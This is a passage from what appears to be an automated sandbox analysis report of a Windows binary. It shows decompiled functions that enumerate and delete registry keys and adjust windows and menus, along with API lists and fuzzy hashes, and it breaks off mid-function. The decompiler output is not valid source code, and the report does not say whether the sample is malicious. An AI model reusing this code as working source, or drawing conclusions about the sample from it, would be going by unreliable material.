                  • _memset.LIBCMT ref: 0040E3E0
                  • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 0040E409
                  • GetWindowLongW.USER32(?,000000FC), ref: 0040E41B
                  • GetWindowLongW.USER32(?,000000FC), ref: 0040E42C
                  • SetWindowLongW.USER32(?,000000FC,?), ref: 0040E448
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: LongWindow$MessageSend_memset
                  • String ID: ,
                  • API String ID: 2997958587-3772416878
                  • Opcode ID: 46bd6ef82fd049dd01f3492840a1388d8c2fcc447518908e6ad8a5c2f51e20a9
                  • Instruction ID: fbb61049e8a99d83785df08a2d163878e1f878e9eea4074a88606dae4575e488
                  • Opcode Fuzzy Hash: 46bd6ef82fd049dd01f3492840a1388d8c2fcc447518908e6ad8a5c2f51e20a9
                  • Instruction Fuzzy Hash: A73193716003109FC720AF66D884A6FBBE4BF44314B15093EE686A7AD2DB38E810CB59
                  Uniqueness

                  Uniqueness Score: 1.79%

                  Function 0041DFBC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 69%
                  			E0041DFBC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void _t36;
				void* _t46;
				long _t60;
				void* _t65;
				void* _t82;
				void* _t83;
				intOrPtr _t91;

				_t68 = __ecx;
				_t67 = __ebx;
				_push(0x228);
				E00429294(E00439335, __ebx, __edi, __esi);
				_t82 = __ecx;
				 *(_t83 - 0x224) = 0;
				 *(_t83 - 0x230) = 0;
				_t36 = E0041DDBF(__ecx, __edx);
				 *(_t83 - 0x22c) = _t36;
				if(_t36 != 0) {
					do {
						_t65 = _t83 - 0x22c;
						_push(_t65);
						_t68 = _t82;
						E0041DDD0();
						if(_t65 != 0) {
							_t68 = _t65;
							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *(_t83 - 0x22c) != 0);
				}
				if( *((intOrPtr*)(_t82 + 0x54)) != 0) {
					_t91 =  *((intOrPtr*)(_t82 + 0x68));
					_t92 = _t91 == 0;
					if(_t91 == 0) {
						E00413DD0(_t68);
					}
					_push(L"Software\\");
					E00410F00(_t67, _t83 - 0x220, 0, _t82, _t92);
					 *((intOrPtr*)(_t83 - 4)) = 0;
					E00405700(_t83 - 0x220,  *((intOrPtr*)(_t82 + 0x54)));
					_push("\\");
					_push(_t83 - 0x220);
					_push(_t83 - 0x234);
					_t46 = E0041281A(_t67, 0, _t82, _t92);
					_push( *((intOrPtr*)(_t82 + 0x68)));
					 *((char*)(_t83 - 4)) = 1;
					_push(_t46);
					_push(_t83 - 0x228);
					E0041281A(_t67, 0, _t82, _t92);
					 *((char*)(_t83 - 4)) = 3;
					E004055F0( *((intOrPtr*)(_t83 - 0x234)) + 0xfffffff0);
					_push(_t83 - 0x228);
					_t82 = 0x80000001;
					_push(0x80000001);
					E0041DE3E(_t67, 0, 0x80000001, _t92);
					if(RegOpenKeyW(0x80000001,  *(_t83 - 0x220), _t83 - 0x224) == 0) {
						_t60 = RegEnumKeyW( *(_t83 - 0x224), 0, _t83 - 0x21c, 0x104);
						_t94 = _t60 - 0x103;
						if(_t60 == 0x103) {
							_push(_t83 - 0x220);
							_push(0x80000001);
							E0041DE3E(_t67, 0, 0x80000001, _t94);
						}
						RegCloseKey( *(_t83 - 0x224));
					}
					RegQueryValueW(_t82,  *(_t83 - 0x228), _t83 - 0x21c, _t83 - 0x230);
					E004055F0( &(( *(_t83 - 0x228))[0xfffffffffffffff8]));
					E004055F0( &(( *(_t83 - 0x220))[0xfffffffffffffff8]));
				}
				return E00429317(_t67, 0, _t82);
			}










                  0x0041dfbc
                  0x0041dfbc
                  0x0041dfbc
                  0x0041dfc6
                  0x0041dfcd
                  0x0041dfcf
                  0x0041dfd5
                  0x0041dfdb
                  0x0041dfe0
                  0x0041dfe8
                  0x0041dfea
                  0x0041dfea
                  0x0041dff0
                  0x0041dff1
                  0x0041dff3
                  0x0041dffa
                  0x0041e003
                  0x0041e005
                  0x0041e005
                  0x0041e008
                  0x0041dfea
                  0x0041e013
                  0x0041e01b
                  0x0041e021
                  0x0041e023
                  0x0041e025
                  0x0041e025
                  0x0041e02a
                  0x0041e035
                  0x0041e043
                  0x0041e046
                  0x0041e04b
                  0x0041e056
                  0x0041e05d
                  0x0041e05e
                  0x0041e063
                  0x0041e066
                  0x0041e06a
                  0x0041e071
                  0x0041e072
                  0x0041e083
                  0x0041e087
                  0x0041e092
                  0x0041e093
                  0x0041e098
                  0x0041e099
                  0x0041e0b4
                  0x0041e0c9
                  0x0041e0cf
                  0x0041e0d4
                  0x0041e0dc
                  0x0041e0dd
                  0x0041e0de
                  0x0041e0de
                  0x0041e0e9
                  0x0041e0e9
                  0x0041e104
                  0x0041e113
                  0x0041e121
                  0x0041e121
                  0x0041e12e

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0041DFC6
                  • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 0041E0AC
                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 0041E0C9
                  • RegCloseKey.ADVAPI32(?), ref: 0041E0E9
                  • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 0041E104
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CloseEnumH_prolog3_OpenQueryValue
                  • String ID: Software\
                  • API String ID: 1666054129-964853688
                  • Opcode ID: b4a0d2341627dfdae7fef1d8aa0728049ad4d36d7fb9bc95688622beae7c11ac
                  • Instruction ID: b15c6a1d5bbe84e58404210d13961f1476762f43c285968fd0894417b26847e8
                  • Opcode Fuzzy Hash: b4a0d2341627dfdae7fef1d8aa0728049ad4d36d7fb9bc95688622beae7c11ac
                  • Instruction Fuzzy Hash: D2419871900528BBCB21EBA5DD49AEEB7B9AF48314F1405DAF405E2191D7789FC0CF18
                  Uniqueness

                  Uniqueness Score: 0.81%

                  Function 0041781C, Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E0041781C(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t34;
				intOrPtr _t36;
				int _t39;
				intOrPtr _t46;
				signed int _t57;
				signed int _t66;
				struct HWND__* _t71;
				signed int _t72;
				void* _t73;

				_t58 = __ecx;
				_push(0x18);
				E0042922B(E00438E6B, __ebx, __edi, __esi);
				_t57 = __ecx;
				_t34 = __ecx + 0xb8;
				 *_t34 =  *_t34 + 1;
				if( *_t34 <= 1) {
					_t36 = E0040F8F7(__ecx, __edi);
					 *((intOrPtr*)(_t73 - 0x10)) = _t36;
					if(_t36 == 0) {
						L2:
						E00413DD0(_t58);
					}
					 *(_t73 - 0x24) = 0x43eb00;
					 *((intOrPtr*)(_t73 - 0x20)) = 0;
					 *((intOrPtr*)(_t73 - 0x14)) = 0;
					 *((intOrPtr*)(_t73 - 0x18)) = 0;
					 *(_t73 - 0x1c) = 0;
					 *(_t73 - 4) = 0;
					_t71 = GetWindow(GetDesktopWindow(), 5);
					if(_t71 != 0) {
						do {
							_t39 = IsWindowEnabled(_t71);
							_t80 = _t39;
							if(_t39 != 0 && E0040E23A(_t57, _t58, 0, _t71, _t80, _t71) != 0 && E004156A7( *((intOrPtr*)( *((intOrPtr*)(_t73 - 0x10)) + 0x20)), _t71) != 0 && SendMessageW(_t71, 0x36c, 0, 0) == 0) {
								EnableWindow(_t71, 0);
								_t58 = _t73 - 0x24;
								E004174AA(_t73 - 0x24, _t71);
							}
							_t71 = GetWindow(_t71, 2);
						} while (_t71 != 0);
						_t72 =  *(_t73 - 0x1c);
						if(_t72 != 0) {
							_t87 = _t72 > 0;
							if(_t72 > 0) {
								goto L2;
							} else {
								_t66 = 4;
								_t46 = E0040B71F(_t87,  ~(0 | _t87 > 0x00000000) | (_t72 + 0x00000001) * _t66);
								_t58 = _t72 << 2;
								 *((intOrPtr*)(_t57 + 0xbc)) = _t46;
								 *((intOrPtr*)((_t72 << 2) + _t46)) = 0;
								if((0 |  *((intOrPtr*)(_t73 - 0x20)) != 0x00000000) == 0) {
									goto L2;
								} else {
									E00402850(_t57,  *((intOrPtr*)(_t57 + 0xbc)), _t58,  *((intOrPtr*)(_t73 - 0x20)), _t58);
								}
							}
						}
					}
					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
					_t34 = E004174C3(_t73 - 0x24);
				}
				return E00429303(_t34);
			}












                  0x0041781c
                  0x0041781c
                  0x00417823
                  0x00417828
                  0x0041782a
                  0x00417830
                  0x00417835
                  0x0041783b
                  0x00417842
                  0x00417847
                  0x00417849
                  0x00417849
                  0x00417849
                  0x0041784e
                  0x00417855
                  0x00417858
                  0x0041785b
                  0x0041785e
                  0x00417863
                  0x00417873
                  0x00417877
                  0x0041787d
                  0x0041787e
                  0x00417884
                  0x00417886
                  0x004178b6
                  0x004178bd
                  0x004178c0
                  0x004178c0
                  0x004178ce
                  0x004178d0
                  0x004178d4
                  0x004178d9
                  0x004178e2
                  0x004178e4
                  0x00000000
                  0x004178ea
                  0x004178ee
                  0x004178fc
                  0x00417904
                  0x00417907
                  0x0041790d
                  0x0041791a
                  0x00000000
                  0x00417920
                  0x0041792b
                  0x00417930
                  0x0041791a
                  0x004178e4
                  0x004178d9
                  0x00417933
                  0x0041793a
                  0x0041793a
                  0x00417944

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00417823
                  • GetDesktopWindow.USER32 ref: 00417866
                  • GetWindow.USER32(00000000), ref: 0041786D
                  • IsWindowEnabled.USER32(00000000), ref: 0041787E
                  • SendMessageW.USER32(00000000,0000036C,00000000,00000000), ref: 004178AA
                  • EnableWindow.USER32(00000000,00000000), ref: 004178B6
                  • GetWindow.USER32(00000000,00000002), ref: 004178C8
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$DesktopEnableEnabledException@8H_prolog3MessageSendThrow
                  • String ID:
                  • API String ID: 1477819144-0
                  • Opcode ID: 71f509dec0510cd0098a64a0cf31119a85f09f9ce080e88fcddbeb1881772901
                  • Instruction ID: 3c561aa6ef1dac1b767ae155073595786efb4d68b8742618b787af31e675a132
                  • Opcode Fuzzy Hash: 71f509dec0510cd0098a64a0cf31119a85f09f9ce080e88fcddbeb1881772901
                  • Instruction Fuzzy Hash: C131D7719402109FDB21BF75CC4D9EFBAB8AF44310F24452EE456EB291DB784D40CB69
                  Uniqueness

                  Uniqueness Score: 1.28%

                  Function 0041C8CC, Relevance: 10.6, APIs: 7, Instructions: 96windowUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0041C8CC(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t31;
				intOrPtr _t51;
				void* _t63;
				signed int _t71;
				void* _t73;

				_t53 = __ecx;
				_push(4);
				E0042922B(E004391F9, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t73 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx + 0xc8)) = 1;
				_t31 = 0x80c83b00;
				if(( *(_t73 + 0xc) & 0x00000004) != 0) {
					_t31 = 0x80c83300;
				}
				if(E004247BF(_t53, 0, 0, 0x43de78, _t31, 0x44be84,  *((intOrPtr*)(_t73 + 8)), 0) != 0) {
					asm("sbb esi, esi");
					_t71 = ( ~( *(_t73 + 0xc) & 0x00005000) & 0xfffff000) + 0x00002000 |  *(_t73 + 0xc) & 0x00000040;
					_t63 = E0041B5B7(_t51, 0);
					if(_t63 != 0) {
						DeleteMenu( *(_t63 + 4), 0xf000, 0);
						DeleteMenu( *(_t63 + 4), 0xf020, 0);
						DeleteMenu( *(_t63 + 4), 0xf030, 0);
						DeleteMenu( *(_t63 + 4), 0xf120, 0);
						E00404820(_t73 + 0xc);
						 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
						if(E00404D40(_t73 + 0xc, 0xf011) != 0) {
							DeleteMenu( *(_t63 + 4), 0xf060, 0);
							AppendMenuW( *(_t63 + 4), 0, 0xf060,  *(_t73 + 0xc));
						}
						 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
						E004055F0( &(( *(_t73 + 0xc))[0xfffffffffffffff8]));
						_t51 =  *((intOrPtr*)(_t73 - 0x10));
					}
					_push(0xe81f);
					_push(_t71 | 0x50000000);
					_push( *((intOrPtr*)(_t73 + 8)));
					_t64 = _t51 + 0xf8;
					if( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xf8)) + 0x17c))() != 0) {
						E0041B5D2(_t64, _t51);
					}
					 *(_t51 + 0xc8) =  *(_t51 + 0xc8) & 0x00000000;
					goto L4;
				} else {
					 *(_t51 + 0xc8) = 0;
					L4:
					return E00429303(1);
				}
			}








                  0x0041c8cc
                  0x0041c8cc
                  0x0041c8d3
                  0x0041c8d8
                  0x0041c8da
                  0x0041c8e1
                  0x0041c8eb
                  0x0041c8f0
                  0x0041c8f2
                  0x0041c8f2
                  0x0041c911
                  0x0041c92e
                  0x0041c942
                  0x0041c949
                  0x0041c94d
                  0x0041c963
                  0x0041c96f
                  0x0041c97b
                  0x0041c987
                  0x0041c98c
                  0x0041c991
                  0x0041c9a4
                  0x0041c9b0
                  0x0041c9bf
                  0x0041c9bf
                  0x0041c9c8
                  0x0041c9cf
                  0x0041c9d4
                  0x0041c9d4
                  0x0041c9d7
                  0x0041c9e2
                  0x0041c9e3
                  0x0041c9e6
                  0x0041c9f8
                  0x0041ca09
                  0x0041ca10
                  0x0041c9fa
                  0x00000000
                  0x0041c913
                  0x0041c913
                  0x0041c919
                  0x0041c91e
                  0x0041c91e

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C8D3
                    • Part of subcall function 0041B5B7: GetSystemMenu.USER32(?,?), ref: 0041B5C2
                  • DeleteMenu.USER32(?,0000F000,00000000), ref: 0041C963
                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 0041C96F
                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 0041C97B
                  • DeleteMenu.USER32(?,0000F120,00000000), ref: 0041C987
                  • DeleteMenu.USER32(?,0000F060,00000000), ref: 0041C9B0
                  • AppendMenuW.USER32(?,00000000,0000F060,00000004), ref: 0041C9BF
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Menu$Delete$AppendH_prolog3System
                  • String ID:
                  • API String ID: 1427010815-0
                  • Opcode ID: b15e1293bd0b583bb0ea560288b2b9202c1115779221f7cab6f86a85f071c67f
                  • Instruction ID: 166b7f312bf8a115184cc9866f58422f5143140c667db65bb4f99035435a30f4
                  • Opcode Fuzzy Hash: b15e1293bd0b583bb0ea560288b2b9202c1115779221f7cab6f86a85f071c67f
                  • Instruction Fuzzy Hash: A231F571680605BBEB209F60CC86FB97661EF44758F148239FE196E2D2CB78AD10D74C
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401DDC, Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                  Download Yara Rule
                  APIs
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E56
                    • Part of subcall function 004049A0: _DebugHeapAllocator.LIBCPMTD ref: 004049AE
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E6F
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E80
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E8D
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EAB
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EE3
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EF4
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401F17
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401F30
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401F49
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AllocatorDebugHeap
                  • String ID:
                  • API String ID: 571936431-0
                  • Opcode ID: e145b664f4ec2858145dce37ae61712d6b79074153d8035d9a467f5c37a10308
                  • Instruction ID: 38d59267fced033494c664b5997d8aa3662d955827d08b83a0b8d19548b0edde
                  • Opcode Fuzzy Hash: e145b664f4ec2858145dce37ae61712d6b79074153d8035d9a467f5c37a10308
                  • Instruction Fuzzy Hash: D0310EB19101199BCB08EBA5DC529FFB775BF94308F50402EE242771D2DE3C6A14CBA9
                  Uniqueness

                  Uniqueness Score: 4.01%

                  Function 0041DE3E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E0041DE3E(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t38;
				void* _t51;
				void* _t54;
				signed int _t57;
				void* _t70;
				void* _t72;
				void* _t75;

				_t75 = __eflags;
				_t57 = __ebx;
				_push(0x228);
				E004292CA(E004392EC, __ebx, __edi, __esi);
				_t70 =  *(_t72 + 8);
				 *(_t72 - 0x230) = _t70;
				E00405590(_t72 - 0x228, _t75,  *((intOrPtr*)(_t72 + 0xc)));
				 *((intOrPtr*)(_t72 - 4)) = 0;
				if(_t70 == 0x80000000) {
					_t51 = E00420117();
					_t77 = _t51 - 1;
					if(_t51 == 1) {
						_push(_t72 - 0x228);
						_push(L"Software\\Classes\\");
						_push(_t72 - 0x224);
						_t54 = E0041DDE9(__ebx, 0, _t70, _t77);
						 *((char*)(_t72 - 4)) = 1;
						E00405630(_t72 - 0x228, _t77, _t54);
						 *((char*)(_t72 - 4)) = 0;
						E004055F0( *((intOrPtr*)(_t72 - 0x224)) + 0xfffffff0);
						 *(_t72 - 0x230) = 0x80000001;
					}
				}
				_t38 = RegOpenKeyW( *(_t72 - 0x230),  *(_t72 - 0x228), _t72 - 0x22c);
				_t71 = _t38;
				if(_t38 != 0) {
					L11:
					__eflags =  &(( *(_t72 - 0x228))[0xfffffffffffffff8]);
					E004055F0( &(( *(_t72 - 0x228))[0xfffffffffffffff8]));
					return E00429326(_t57, 0, _t71);
				} else {
					while(1) {
						_t71 = RegEnumKeyW( *(_t72 - 0x22c), 0, _t72 - 0x220, 0x104);
						_t80 = _t71;
						if(_t71 != 0) {
							break;
						}
						_push(_t72 - 0x220);
						 *((char*)(_t72 - 4)) = 2;
						E00410F00(_t57, _t72 - 0x224, 0, _t71, _t80);
						 *((char*)(_t72 - 4)) = 3;
						_t71 = E0041DE3E(_t57, 0, _t71, _t80,  *(_t72 - 0x22c), _t72 - 0x224);
						_t57 = _t57 & 0xffffff00 | _t71 != 0x00000000;
						 *((char*)(_t72 - 4)) = 2;
						E004055F0( *((intOrPtr*)(_t72 - 0x224)) + 0xfffffff0);
						if(_t57 != 0) {
							break;
						}
						 *((intOrPtr*)(_t72 - 4)) = 0;
					}
					__eflags = _t71 - 0x103;
					if(_t71 == 0x103) {
						L9:
						_t71 = RegDeleteKeyW( *(_t72 - 0x230),  *(_t72 - 0x228));
						L10:
						RegCloseKey( *(_t72 - 0x22c));
						goto L11;
					}
					__eflags = _t71 - 0x3f2;
					if(_t71 != 0x3f2) {
						goto L10;
					}
					goto L9;
				}
			}










                  0x0041de3e
                  0x0041de3e
                  0x0041de3e
                  0x0041de48
                  0x0041de50
                  0x0041de5a
                  0x0041de60
                  0x0041de67
                  0x0041de70
                  0x0041de72
                  0x0041de77
                  0x0041de7a
                  0x0041de82
                  0x0041de89
                  0x0041de8e
                  0x0041de8f
                  0x0041de9e
                  0x0041dea2
                  0x0041deb0
                  0x0041deb4
                  0x0041deb9
                  0x0041deb9
                  0x0041de7a
                  0x0041ded6
                  0x0041dedc
                  0x0041dee0
                  0x0041dfa4
                  0x0041dfaa
                  0x0041dfad
                  0x0041dfb9
                  0x0041dee6
                  0x0041dee6
                  0x0041deff
                  0x0041df01
                  0x0041df03
                  0x00000000
                  0x00000000
                  0x0041df0b
                  0x0041df12
                  0x0041df16
                  0x0041df28
                  0x0041df37
                  0x0041df3b
                  0x0041df41
                  0x0041df45
                  0x0041df4c
                  0x00000000
                  0x00000000
                  0x0041df4e
                  0x0041df4e
                  0x0041df74
                  0x0041df7a
                  0x0041df84
                  0x0041df96
                  0x0041df98
                  0x0041df9e
                  0x00000000
                  0x0041df9e
                  0x0041df7c
                  0x0041df82
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041df82

                  APIs
                  • __EH_prolog3_catch_GS.LIBCMT ref: 0041DE48
                  • RegOpenKeyW.ADVAPI32(?,?,?), ref: 0041DED6
                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 0041DEF9
                    • Part of subcall function 0041DDE9: __EH_prolog3.LIBCMT ref: 0041DDF0
                    • Part of subcall function 0041DDE9: _DebugHeapAllocator.LIBCPMTD ref: 0041DE07
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AllocatorDebugEnumH_prolog3H_prolog3_catch_HeapOpen
                  • String ID: Software\Classes\
                  • API String ID: 751309350-1121929649
                  • Opcode ID: 2c6e8effad27e3013cf491f35a6007a38afd1bf70f0ac5b35f02769d1177a11c
                  • Instruction ID: 4ba86f8b9ab8953ea9b5b47a85a972cb9b2501afc94746916ee130f1a5d2ab51
                  • Opcode Fuzzy Hash: 2c6e8effad27e3013cf491f35a6007a38afd1bf70f0ac5b35f02769d1177a11c
                  • Instruction Fuzzy Hash: 2E316171C00128AACB21EBA4DD48BEEB7B4EF18314F1402EAE95963291DB384FC4DF55
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00417945, Relevance: 10.6, APIs: 7, Instructions: 80windowthreadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00417945(intOrPtr* __ecx, long _a4) {
				void* __ebx;
				void* _t26;
				signed int _t27;
				long _t40;
				signed int _t43;
				intOrPtr* _t54;

				_t47 = __ecx;
				_t43 = _a4;
				_t54 = __ecx;
				if(_t43 != 0 && ( *(__ecx + 0x3c) & 0x00000004) != 0) {
					E00411E6E(__ecx, 0);
					return SetFocus(0);
				}
				_t26 = E0040E20E(_t43, _t47, GetParent( *(_t54 + 0x20)));
				if(_t26 == 0) {
					L5:
					if(_t43 != 0) {
						_t27 =  *(_t54 + 0x3c);
						if(_t27 < 0) {
							 *(_t54 + 0x3c) = _t27 & 0xffffff7f;
							 *((intOrPtr*)( *_t54 + 0x104))();
							_a4 =  *(_t54 + 0x20);
							if(GetActiveWindow() == _a4) {
								SendMessageW(_a4, 6, 1, 0);
							}
						}
						if(( *(_t54 + 0x3c) & 0x00000020) != 0) {
							SendMessageW( *(_t54 + 0x20), 0x86, 1, 0);
						}
					} else {
						if( *((intOrPtr*)(_t54 + 0xb8)) == 0) {
							 *(_t54 + 0x3c) =  *(_t54 + 0x3c) | 0x00000080;
							 *((intOrPtr*)( *_t54 + 0x100))();
						}
					}
					asm("sbb ebx, ebx");
					return E00416080(_t54, ( ~_t43 & 0xfffffff0) + 0x20);
				} else {
					_a4 = 0;
					GetWindowThreadProcessId( *(_t26 + 0x20),  &_a4);
					_t40 = GetCurrentProcessId();
					if(_t40 == _a4) {
						return _t40;
					}
					goto L5;
				}
			}









                  0x00417945
                  0x0041794b
                  0x00417952
                  0x00417956
                  0x0041795f
                  0x00000000
                  0x00417965
                  0x0041797a
                  0x00417981
                  0x004179a3
                  0x004179a5
                  0x004179c2
                  0x004179cd
                  0x004179d4
                  0x004179db
                  0x004179e4
                  0x004179f0
                  0x004179fb
                  0x004179fb
                  0x004179f0
                  0x00417a01
                  0x00417a0f
                  0x00417a0f
                  0x004179a7
                  0x004179ad
                  0x004179b1
                  0x004179ba
                  0x004179ba
                  0x004179ad
                  0x00417a13
                  0x00000000
                  0x00417983
                  0x0041798b
                  0x0041798e
                  0x00417994
                  0x0041799d
                  0x00417a27
                  0x00417a27
                  0x00000000
                  0x0041799d

                  APIs
                  • SetFocus.USER32(00000000), ref: 00417965
                  • GetParent.USER32(?), ref: 00417973
                  • GetWindowThreadProcessId.USER32(?,?), ref: 0041798E
                  • GetCurrentProcessId.KERNEL32 ref: 00417994
                  • GetActiveWindow.USER32 ref: 004179E7
                  • SendMessageW.USER32(?,00000006,00000001,00000000), ref: 004179FB
                  • SendMessageW.USER32(?,00000086,00000001,00000000), ref: 00417A0F
                    • Part of subcall function 00411E6E: EnableWindow.USER32(?,004089A8), ref: 00411E7F
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                  • String ID:
                  • API String ID: 2169720751-0
                  • Opcode ID: 88780be8c65a5834ad4b064e61823059d67935aa198ae239829dba557eeb9c58
                  • Instruction ID: 6334339bbabaa346ef34ed15cd65935d7a3aa1158bc58f598a8bac2caa3b2a90
                  • Opcode Fuzzy Hash: 88780be8c65a5834ad4b064e61823059d67935aa198ae239829dba557eeb9c58
                  • Instruction Fuzzy Hash: 8521F171254600AFDB219F24DCC8B9E7BF5BF44390F14452AF98A872A0C7B9B880CB49
                  Uniqueness

                  Uniqueness Score: 0.83%

                  Function 0041E362, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041E362(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
